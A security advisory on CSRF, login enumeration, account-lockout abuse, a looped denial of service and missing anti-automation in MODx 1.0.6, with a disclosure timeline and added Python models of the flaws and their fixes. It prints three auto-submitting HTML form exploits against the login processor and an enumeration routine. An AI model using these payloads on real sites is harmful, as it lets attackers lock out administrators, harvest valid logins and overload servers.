MODx 1.0.6 XSS / Abuse Functionality / Denial Of Service

Posted Nov 29, 2012
Authored by MustLive

MODx versions 1.0.6 and below suffer from cross site request forgery, abuse of functionality, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, csrf
SHA-256 | 06e2431993e324f2e749b37a6e7c7e00a479836f6dfc847e0cea7aa9db329961

Hello list!

I want to warn you about new security vulnerabilities in MODx. This is the
second part of the vulnerabilities in this CMS (6 vulnerabilities in addition
to the previous 19).

These are Cross-Site Request Forgery, Abuse of Functionality, Denial of
Service and Insufficient Anti-automation vulnerabilities in MODx. They concern
the 0.x and 1.x (Evolution) versions of MODx CMS. The 2.x (Revolution)
versions of MODx have some of these holes and some new ones; I have written a
separate advisory about them.

-------------------------
Affected products:
-------------------------

MODx 1.0.6 and earlier versions are vulnerable.

----------
Details:
----------

Cross-Site Request Forgery (WASC-09):

The login form (http://site/manager/) has no captcha or other protection
against cross-site submission, so it can be used for several attacks: a CSRF
attack that logs the victim's browser into an account (remote login, so that
vulnerabilities reachable only from inside the account can then be attacked),
automated entering into accounts, phishing and other automated attacks. These
are described in the article "Attacks on unprotected login forms"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).
The DoS attack described below is conducted via this CSRF vulnerability.
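
As an added example (not code from the advisory or from MODx), the following
Python sketch shows a pre-login anti-CSRF check of the kind that stops a
cross-site form post to the login processor: the server sets a random cookie
when it serves the login form, the form carries an HMAC of that cookie value,
and the processor accepts the POST only if the field matches the cookie. A form
hosted on another origin cannot read the cookie and therefore cannot produce
the field. The key, cookie name and field name are assumptions for
illustration.

```python
"""Added example, not MODx code: pre-login CSRF token bound to a cookie.
SERVER_KEY, COOKIE and FIELD are assumed names; the sample requests in
__main__ are constructed."""
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret (assumption)
COOKIE = "modx_login_nonce"            # cookie set with the login form
FIELD = "login_token"                  # hidden field carried by the form


def issue_login_form():
    """Served with GET /manager/. Returns (cookie value, hidden field value).
    The field is an HMAC of the cookie, so it is useless without the cookie
    and cannot be forged without SERVER_KEY."""
    nonce = secrets.token_urlsafe(24)
    token = hmac.new(SERVER_KEY, nonce.encode(), hashlib.sha256).hexdigest()
    return nonce, token


def csrf_check(cookies: dict, form: dict) -> bool:
    """Run by the login processor before it looks at username/password."""
    nonce = cookies.get(COOKIE)
    token = form.get(FIELD)
    if not nonce or not token:
        return False
    expected = hmac.new(SERVER_KEY, nonce.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, token)   # constant-time compare


def process_login(cookies: dict, form: dict) -> str:
    """Decision the processor makes before credential checking (which is
    not modelled here)."""
    if not csrf_check(cookies, form):
        return "rejected: missing or invalid login token"
    return "accepted for credential check"


if __name__ == "__main__":
    nonce, token = issue_login_form()
    # Legitimate submission: browser sends the cookie and the hidden field.
    print(process_login({COOKIE: nonce}, {FIELD: token, "username": "test"}))
    # Cross-site form (as in the advisory's exploits): the browser attaches
    # the cookie, but the foreign page cannot know the matching field.
    print(process_login({COOKIE: nonce},
                        {"ajax": "1", "username": "test", "password": "test"}))
```

The check complements, rather than replaces, a captcha or rate limit: it stops
a third-party page from submitting the form, but an attacker with a browser can
still fetch the form and post it by hand or by script. Marking the cookie
SameSite=Lax gives browsers a second reason to drop the cross-site POST.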

Abuse of Functionality (Login Enumeration) (WASC-42):

Login Enumeration is possible in the login form (http://site/manager/). If
blocking is not triggered after three requests (the default; the number can
be set at the site), the login does not exist in the system: the blocking
counter is kept only for existing logins. The attack works when blocking is
turned on.

So, by sending three (by default) POST requests per candidate login, it is
possible to pick out valid logins, which can then be used in the Brute Force
vulnerability mentioned earlier.

Exploit:

<body onLoad="document.hack.submit()">
<form name="hack"
action="http://site/manager/processors/login.processor.php" method="post">
<input type="hidden" name="ajax" value="1">
<input type="hidden" name="username" value="test">
<input type="hidden" name="password" value="test">
</form>
</body>

Abuse of Functionality (WASC-42):

Once a login has been found with the above vulnerability, the account
blocking can be abused. After three unsuccessful attempts (the number can be
set at the site) the account is blocked, including the administrator's
account. By persistently sending requests to this functionality (three
incorrect requests at a time), it is possible to keep the account, including
the administrator's, permanently in the blocked state.

Exploit:

<body onLoad="document.hack.submit()">
<form name="hack"
action="http://site/manager/processors/login.processor.php" method="post">
<input type="hidden" name="ajax" value="1">
<input type="hidden" name="username" value="admin">
</form>
</body>
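
As an added example (not code from the advisory or from MODx), the Python
model below reproduces the blocking behaviour described in the two Abuse of
Functionality sections above and runs both attacks against it: the failure
counter lives on the account row, so only existing logins can reach the
blocked state, which both leaks which logins exist and lets an attacker keep
the administrator locked out. A hardened variant with the same interface
counts failures per source address for every submitted name, real or not, and
answers identically for unknown, wrong-password and throttled logins. The
account table, passwords, addresses and the failure limit are constructed
sample data; MODx's real user table and settings are not modelled.

```python
"""Added example, not MODx code: models the account-blocking logic the
advisory describes and the enumeration / lockout-abuse attacks against it.
ACCOUNTS, FAIL_LIMIT and the IP addresses are constructed sample data."""
from collections import defaultdict
from typing import Optional

ACCOUNTS = {"admin": "S3cret!", "editor": "pa55word"}   # constructed
FAIL_LIMIT = 3   # "three unsuccessful attempts (as can be set at the site)"


class VulnerableLoginProcessor:
    """Failure counter and blocked flag live on the account, so a name that
    has no account never changes state. Answers: 'ok', 'fail', 'blocked'."""

    def __init__(self):
        self.failed = defaultdict(int)
        self.blocked = set()

    def login(self, username: str, password: Optional[str], src_ip: str) -> str:
        # src_ip is accepted only for interface parity; it is never consulted.
        if username not in ACCOUNTS:        # no row, nothing to count
            return "fail"
        if username in self.blocked:
            return "blocked"
        if password == ACCOUNTS[username]:
            self.failed[username] = 0
            return "ok"
        self.failed[username] += 1
        if self.failed[username] >= FAIL_LIMIT:
            self.blocked.add(username)      # blocks even the administrator
            return "blocked"
        return "fail"


class HardenedLoginProcessor:
    """Same interface. Failures are counted per (source address, name) for
    every name submitted, and a throttled request gets the same answer as a
    wrong password. Nothing is ever written to the account, so the owner can
    still log in from elsewhere and no enumeration oracle remains."""

    def __init__(self):
        self.failed = defaultdict(int)   # key: (src_ip, username)

    def login(self, username: str, password: Optional[str], src_ip: str) -> str:
        key = (src_ip, username)
        if self.failed[key] >= FAIL_LIMIT:
            return "fail"                   # throttled, indistinguishable
        if username in ACCOUNTS and password == ACCOUNTS[username]:
            self.failed[key] = 0
            return "ok"
        self.failed[key] += 1
        return "fail"


def enumerate_logins(processor, candidates, src_ip="203.0.113.5"):
    """Login Enumeration: FAIL_LIMIT bad passwords per candidate; a 'blocked'
    answer proves the login exists. Against the vulnerable processor this
    also leaves every existing account blocked, as the advisory notes."""
    found = []
    for name in candidates:
        answers = [processor.login(name, "wrong-%d" % i, src_ip)
                   for i in range(FAIL_LIMIT)]
        if "blocked" in answers:
            found.append(name)
    return found


def keep_locked(processor, username, rounds, src_ip="203.0.113.5"):
    """Lockout abuse: keep sending batches of bad passwords, then check
    whether the owner's correct password (from another address) is refused."""
    for _ in range(rounds):
        for i in range(FAIL_LIMIT):
            processor.login(username, "wrong-%d" % i, src_ip)
    return processor.login(username, ACCOUNTS[username], "198.51.100.7") != "ok"


if __name__ == "__main__":
    names = ["root", "admin", "guest", "editor"]
    print("vulnerable:", enumerate_logins(VulnerableLoginProcessor(), names))
    print("hardened:  ", enumerate_logins(HardenedLoginProcessor(), names))
    print("admin locked out (vulnerable):", keep_locked(VulnerableLoginProcessor(), "admin", 5))
    print("admin locked out (hardened):  ", keep_locked(HardenedLoginProcessor(), "admin", 5))
```

The design point is that the counter must be keyed on something the attacker
supplies (address, session, cookie) rather than on the victim's account, and
that the response must not depend on whether the account exists; a captcha
after a few failures, as the advisory's Insufficient Anti-automation section
implies, would be a further layer on the same principle.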

Denial of Service (WASC-10):

When a POST request is sent to the script
http://site/manager/processors/login.processor.php, it returns the browser to
the previous page, which again submits to this script. This creates a Looped
DoS that can overload the server.

I wrote about Looped DoS vulnerabilities in the 2008 articles Looped DoS and
Classification of DoS vulnerabilities in web applications
(http://websecurity.com.ua/2663/) and in the 2009 article Redirectors: the
phantom menace
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2009-September/005722.html).
As described in those articles, to conduct such a DoS attack it is enough to
give users a link to the looped redirect, which will then send requests
infinitely and overload the server (in the case of MODx both unidirectional
and bidirectional Looped DoS are possible). For a POST request this can be an
HTML form placed on a popular site, e.g. in a hidden iframe, so that the
attack runs invisibly for as long as users keep the page with the iframe
open.

Exploit:

<body onLoad="document.hack.submit()">
<form name="hack"
action="http://site/manager/processors/login.processor.php" method="post">
</form>
</body>
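
As an added example (not code from the advisory or from MODx), the Python
model below shows how the loop closes and how a scanner can detect it. The
"previous page" the processor returns to is taken here from the Referer
header, and the hostile page auto-submits the form on load as in the exploit
above; both the exact redirect target MODx uses and the paths are assumptions
for illustration. The checker follows redirects and auto-submits with a
request budget and reports a cycle as soon as the same request recurs; a
hardened responder that always redirects to a fixed landing page is shown
beside it.

```python
"""Added example, not MODx code: models the POST -> redirect -> re-POST loop
and a redirect-cycle detector. The paths, the use of Referer as the
"previous page" and the request budget are assumptions."""
from typing import Callable, List, Optional, Tuple

PROCESSOR = "/manager/processors/login.processor.php"
LANDING = "/manager/"
EVIL_PAGE = "/evil/autosubmit.html"    # constructed: page with onLoad submit

Request = Tuple[str, str, Optional[str]]          # (method, path, referer)
Response = Tuple[str, Optional[str]]              # (status, next target)
Site = Callable[[str, str, Optional[str]], Response]


def vulnerable_site(method: str, path: str, referer: Optional[str]) -> Response:
    """The processor 'returns to the previous page' (Referer, assumed), and
    the hostile page re-submits the form as soon as it loads."""
    if path == PROCESSOR and method == "POST":
        return ("302", referer or LANDING)
    if path == EVIL_PAGE:
        return ("200+autosubmit", PROCESSOR)
    return ("200", None)


def hardened_site(method: str, path: str, referer: Optional[str]) -> Response:
    """Same model, but the processor never redirects to a caller-controlled
    location, so a foreign page cannot become the other half of the loop."""
    if path == PROCESSOR and method == "POST":
        return ("302", LANDING)
    if path == EVIL_PAGE:
        return ("200+autosubmit", PROCESSOR)
    return ("200", None)


def follow(site: Site, start: Request, budget: int = 20):
    """Follow redirects and auto-submits from `start`. Returns
    (loop_found, requests_made, trace). Requests are identified by
    (method, path); seeing one a second time is a cycle. The budget bounds
    the check itself so the scanner does not become part of the DoS."""
    seen = set()
    trace: List[Request] = []
    current = start
    for _ in range(budget):
        method, path, referer = current
        trace.append(current)
        key = (method, path)
        if key in seen:
            return True, len(trace), trace
        seen.add(key)
        status, target = site(method, path, referer)
        if status == "302":
            current = ("GET", target, path)
        elif status == "200+autosubmit":
            current = ("POST", target, path)
        else:
            return False, len(trace), trace
    return False, len(trace), trace   # budget exhausted without a repeat


if __name__ == "__main__":
    start: Request = ("POST", PROCESSOR, EVIL_PAGE)
    for name, site in (("vulnerable", vulnerable_site), ("hardened", hardened_site)):
        loop, n, trace = follow(site, start)
        print(name, "loop" if loop else "no loop", "after", n, "requests")
        for req in trace:
            print("   ", req)
```

In the vulnerable model every lap of the loop is two requests to the target
server per browser holding the iframe open, which is what makes the attack
scale with the audience of the page that hosts the form. The fix side is the
usual redirect rule: send the user to a fixed, server-chosen location, never
to a Referer or request parameter.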

Insufficient Anti-automation (WASC-21):

The login form (http://site/manager/) has no protection against automated
requests. This allows logins to be picked out automatically (via the Abuse
of Functionality vulnerability), passwords for those logins to be picked
automatically (via the Brute Force vulnerability), and the revealed accounts
to be blocked automatically.

The password recovery form (http://site/manager/index.php?action=show_form)
has no protection against automated requests either, which allows users'
e-mail addresses to be picked out automatically.

------------
Timeline:
------------

2012.06.28 - announced at my site.
2012.06.28 - informed the developers about the first part of the vulnerabilities.
2012.06.30 - informed the developers about the second part of the vulnerabilities.
2012.07.28 - informed the developers about vulnerabilities in MODx Revolution
and reminded them about the previous two letters.
2012.07.28-2012.10.31 - during the conversation with the developers about MODx
Revolution, I constantly reminded them that I had sent them information about
holes in Evolution and could resend it, because it was clear that they had
missed it (they were only answering concerning Revolution).
2012.11.02 - after the developers said they wanted to see this information
(missed by them in June), I resent the first two letters to the developers.
2012.11.24 - disclosed at my site (http://websecurity.com.ua/5929/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
